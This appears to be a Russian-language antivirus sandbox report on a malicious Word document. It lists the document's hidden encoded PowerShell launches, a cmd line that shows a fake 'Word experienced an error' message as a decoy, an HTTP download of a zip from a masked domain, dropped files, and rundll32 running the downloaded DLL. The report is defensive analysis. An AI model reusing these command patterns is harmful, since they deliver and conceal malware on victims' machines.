Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -ENCOD IAAgACQATQA0AGwAQwBrADIAIAAgAD0AIAAgAFsAdAB5AHAAZQBdACgAIgB7ADAAfQB7ADEAfQB7ADMAfQB7ADUAfQB7ADQAfQB7ADIAfQAiAC0AZgAnAHMAeQBTAFQARQAnACwAJwBtAC4ASQBPACcALAAnAFkA...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1580
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\1144610.cvr
- %HOMEPATH%\n2etldu\oizxpuy\y43j3bs.dll
Сетевая активность
TCP
Запросы HTTP GET
- http://nd###pply.dk/hdualfo.zip
UDP
- DNS ASK nd###pply.dk
Другое
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAgACQATQA0AGwAQwBrADIAIAAgAD0AIAAgAFsAdAB5AHAAZQBdACgAIgB7AD...
- '<SYSTEM32>\msg.exe' user /v Word experienced an error trying to open the file.
- '<SYSTEM32>\rundll32.exe' %HOMEPATH%\N2etldu\Oizxpuy\Y43j3bs.dll 0
